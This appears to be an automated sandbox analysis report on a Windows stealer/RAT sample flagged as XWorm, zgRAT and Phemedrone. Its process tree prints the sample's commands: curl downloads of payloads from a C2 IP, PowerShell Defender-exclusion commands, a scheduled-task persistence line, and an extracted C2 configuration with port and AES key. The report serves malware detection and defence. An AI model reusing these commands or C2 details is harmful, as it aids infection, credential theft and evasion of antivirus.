Edit tour
Windows
Analysis Report
ZOL2mIYAUH.exe
Overview
General Information
| Sample name: | ZOL2mIYAUH.exerenamed because original name is a hash value |
| Original sample name: | 789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6.exe |
| Analysis ID: | 1561594 |
| MD5: | 12395d08dc0bfe12e63605328ddd982f |
| SHA1: | 51ceb544e3900fb85fe7aada564d081219464d1d |
| SHA256: | 789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6 |
| Tags: | exeuser-Chainskilabs |
| Infos: |   |
 | |
Detection
Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected PureLog Stealer
Yara detected XWorm
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
- System is w10x64
ZOL2mIYAUH.exe (PID: 6028 cmdline: "C:\Users\ user\Deskt op\ZOL2mIY AUH.exe" MD5: 12395D08DC0BFE12E63605328DDD982F) 
conhost.exe (PID: 6024 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7300 cmdline: "powershel l" -NoProf ile -Execu tionPolicy Bypass -C ommand "Ad d-MpPrefer ence -Excl usionPath 'C:\Users\ '" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7540 cmdline:
"cmd.exe" /c mkdir C :\Users\gb cd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7560 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7612 cmdline:
"curl.exe" -s http:/ /79.110.49 .246/dided ba/abc -o C:\Users\g bcd\fff.sc r MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - conhost.exe (PID: 7620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7712 cmdline:
"curl.exe" -s http:/ /79.110.49 .246/dided ba/dddv -o C:\Users\ gbcd\qqq.s cr MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - conhost.exe (PID: 7720 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7848 cmdline:
"curl.exe" -s http:/ /79.110.49 .246/dided ba/write - o C:\Users \gbcd\ddd. scr MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - conhost.exe (PID: 7856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 7944 cmdline:
"curl.exe" -s https: //raw.gith ubusercont ent.com/hu uuuggga/aa aaa1/refs/ heads/main /srtware.e xe -o C:\U sers\gbcd\ srtware.ex e MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - conhost.exe (PID: 7952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - fff.scr (PID: 8024 cmdline:
"C:\Users\ gbcd\fff.s cr" MD5: 81720AF225C9B2E5C8D7B81A7581CF5D) - qqq.scr (PID: 3452 cmdline:
"C:\Users\ gbcd\qqq.s cr" MD5: 33300ACB6FB3C7EFFAE29A3EB133BE2E) - powershell.exe (PID: 7384 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\gbcd \qqq.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6632 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' qqq.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3268 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nPath 'C:\ Users\Publ ic\winnoti fy.scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4268 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass Add-Mp Preference -Exclusio nProcess ' winnotify. scr' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2092 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4484 cmdline:
"C:\Window s\System32 \schtasks. exe" /crea te /f /RL HIGHEST /s c minute / mo 1 /tn " winnotify" /tr "C:\U sers\Publi c\winnotif y.scr" MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 5576 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- winnotify.scr (PID: 5920 cmdline:
"C:\Users\ Public\win notify.scr " /S MD5: 33300ACB6FB3C7EFFAE29A3EB133BE2E)
- winnotify.scr (PID: 7980 cmdline:
"C:\Users\ Public\win notify.scr " /S MD5: 33300ACB6FB3C7EFFAE29A3EB133BE2E)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
{"C2 url": ["79.110.49.246"], "Port": 2331, "Aes key": "<e4efraq2sdsfvrf>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | ||
| JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | ||
| JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security | ||
| Click to see the 27 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
| |
| Click to see the 7 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: | ||
| Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-23T21:10:39.044988+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:10:50.432999+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:10:53.983309+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:02.062613+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:13.490207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:23.968499+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:24.989256+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:36.364211+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:47.805214+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:53.987648+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:11:59.162483+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:10.625544+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:22.198975+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:23.978371+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:33.747164+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:44.974645+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:53.980651+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:12:56.372835+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| 2024-11-23T21:13:10.429811+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 79.110.49.246 | 2331 | 192.168.2.7 | 49868 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-23T21:10:39.225371+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:10:50.461753+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:11:02.090623+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:11:13.511136+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:11:25.009018+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:11:36.385969+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:11:47.849077+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:11:59.206367+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:12:10.641354+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:12:22.230408+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:12:33.800468+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:12:45.049960+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:12:56.400521+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
| 2024-11-23T21:13:10.431241+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49868 | 79.110.49.246 | 2331 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Avira: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
Compliance | |
|---|
| Source: | Unpacked PE file: | ||
| Source: | Unpacked PE file: | ||
| Source: | Unpacked PE file: | ||
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_00469CD8 | |
| Source: | Code function: | 23_2_00D33CD8 | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | URLs: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||